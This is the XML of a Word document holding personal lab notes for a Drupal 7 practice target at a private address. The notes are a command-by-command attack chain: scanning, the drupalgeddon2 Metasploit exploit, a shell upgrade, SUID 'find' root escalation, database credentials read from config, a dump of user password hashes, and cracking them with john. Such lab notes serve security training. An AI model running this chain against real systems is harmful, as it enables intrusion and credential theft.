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97F39" w14:textId="30CDE145" w:rsidR="00C320A1" w:rsidRDefault="005D40A2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t xml:space="preserve"> 192.168.1.175 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D40A2">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6547CF2F" w14:textId="72609795" w:rsidR="005D40A2" w:rsidRDefault="0071142C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u 192.168.1.175</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA41DDF" w14:textId="061861F2" w:rsidR="0071142C" w:rsidRDefault="00850D07">
      <w:r>
        <w:t xml:space="preserve">check version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wapalizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="707243AC" w14:textId="2DAEE772" w:rsidR="00850D07" w:rsidRDefault="00850D07">
      <w:r>
        <w:t xml:space="preserve">&gt;search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>7  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>search exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1DE27" w14:textId="06E363F5" w:rsidR="00A26B46" w:rsidRDefault="00A26B46">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t xml:space="preserve"> exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A26B46">
        <w:t>/drupal_drupalgeddon2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3111D" w14:textId="264ADEFA" w:rsidR="00327A17" w:rsidRDefault="00327A17">
      <w:r>
        <w:t>set RHOST &lt;ip&gt;</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C7E5650" w14:textId="56771AE7" w:rsidR="00A26B46" w:rsidRDefault="00A26B46">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="324FF2E6" w14:textId="50B84FC0" w:rsidR="00A26B46" w:rsidRDefault="00A04C85">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ( to get shell )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FED86B" w14:textId="357856D4" w:rsidR="00FA5312" w:rsidRDefault="00B86318">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/bash")'   (get terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C12EF1" w14:textId="3BFD1D50" w:rsidR="005463B4" w:rsidRPr="005463B4" w:rsidRDefault="005463B4" w:rsidP="007736B7">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005463B4">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005463B4">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005463B4">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005463B4">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> \; -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005463B4">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>quit</w:t>
      </w:r>
      <w:r w:rsidR="003666D3" w:rsidRPr="003666D3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003666D3" w:rsidRPr="003666D3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF4F4"/>
        </w:rPr>
        <w:t>for root permission)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A7C88C" w14:textId="77777777" w:rsidR="005463B4" w:rsidRPr="003666D3" w:rsidRDefault="005463B4"/>
    <w:p w14:paraId="49600485" w14:textId="77777777" w:rsidR="00FA5312" w:rsidRDefault="00FA5312" w:rsidP="00FA5312">
      <w:r>
        <w:t>'username' =&gt; '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925B75F" w14:textId="40F49230" w:rsidR="00FA5312" w:rsidRDefault="00FA5312" w:rsidP="00FA5312">
      <w:r>
        <w:t xml:space="preserve">      '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>' =&gt; 'R0ck3t',  (database username password</w:t>
      </w:r>
      <w:r w:rsidR="00C147E8">
        <w:t xml:space="preserve"> will get from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C147E8">
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C147E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C147E8">
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C147E8">
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19039D0E" w14:textId="140B212B" w:rsidR="00446A2B" w:rsidRDefault="00446A2B" w:rsidP="00FA5312">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A042805" w14:textId="19A7A677" w:rsidR="00446A2B" w:rsidRDefault="00446A2B" w:rsidP="00FA5312">
      <w:r>
        <w:t>Show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA9E5B1" w14:textId="55C112BB" w:rsidR="00427FFE" w:rsidRDefault="00427FFE" w:rsidP="00FA5312">
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupaldb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AF863A0" w14:textId="2B464927" w:rsidR="00D16566" w:rsidRDefault="00D16566" w:rsidP="00FA5312">
      <w:r>
        <w:t>Show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42712B8B" w14:textId="0BD4B59E" w:rsidR="00505629" w:rsidRDefault="00505629" w:rsidP="00FA5312">
      <w:r w:rsidRPr="00505629">
        <w:t>select * from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A482BE9" w14:textId="3DC98EB8" w:rsidR="003533D4" w:rsidRDefault="003533D4" w:rsidP="00FA5312"/>
    <w:p w14:paraId="1B2DBF9A" w14:textId="77777777" w:rsidR="003533D4" w:rsidRDefault="003533D4" w:rsidP="003533D4">
      <w:r>
        <w:t>admin   | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com     |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com     | b:0; |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7874F318" w14:textId="451C38E2" w:rsidR="003533D4" w:rsidRDefault="003533D4" w:rsidP="003533D4">
      <w:r>
        <w:t xml:space="preserve">|   2 | Fred    | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BF288" w14:textId="2C9C8ACE" w:rsidR="00C55684" w:rsidRDefault="00C55684" w:rsidP="00FA5312">
      <w:r w:rsidRPr="00C55684">
        <w:t>X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85B8D0" w14:textId="010FAAFB" w:rsidR="006A0426" w:rsidRDefault="006A0426" w:rsidP="00FA5312"/>
    <w:p w14:paraId="511F0120" w14:textId="08D5046F" w:rsidR="006A0426" w:rsidRDefault="006A0426" w:rsidP="00FA5312">
      <w:r>
        <w:t xml:space="preserve">Hashid -m </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ hash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”  (to identify hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F17CE11" w14:textId="4344101C" w:rsidR="00963D37" w:rsidRDefault="00963D37" w:rsidP="00FA5312">
      <w:r w:rsidRPr="00963D37">
        <w:t>john --format=Drupal7 --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00963D37">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00963D37">
        <w:t>/share/wordlists/rockyou.txt hashnew.txt</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00963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C0"/>
    <w:rsid w:val="00327A17"/>
    <w:rsid w:val="003533D4"/>
    <w:rsid w:val="003666D3"/>
    <w:rsid w:val="00427FFE"/>
    <w:rsid w:val="00446A2B"/>
    <w:rsid w:val="00505629"/>
    <w:rsid w:val="005463B4"/>
    <w:rsid w:val="005D40A2"/>
    <w:rsid w:val="006A0426"/>
    <w:rsid w:val="0071142C"/>
    <w:rsid w:val="007736B7"/>
    <w:rsid w:val="00850D07"/>
    <w:rsid w:val="00963D37"/>
    <w:rsid w:val="00A04C85"/>
    <w:rsid w:val="00A26B46"/>
    <w:rsid w:val="00B86318"/>
    <w:rsid w:val="00C147E8"/>
    <w:rsid w:val="00C320A1"/>
    <w:rsid w:val="00C55684"/>
    <w:rsid w:val="00D16566"/>
    <w:rsid w:val="00E16BC0"/>
    <w:rsid w:val="00FA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C949"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BEDBA4AF-9E92-450E-8E3B-065474C6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3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63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4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Cyber</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-03T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-29T16:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>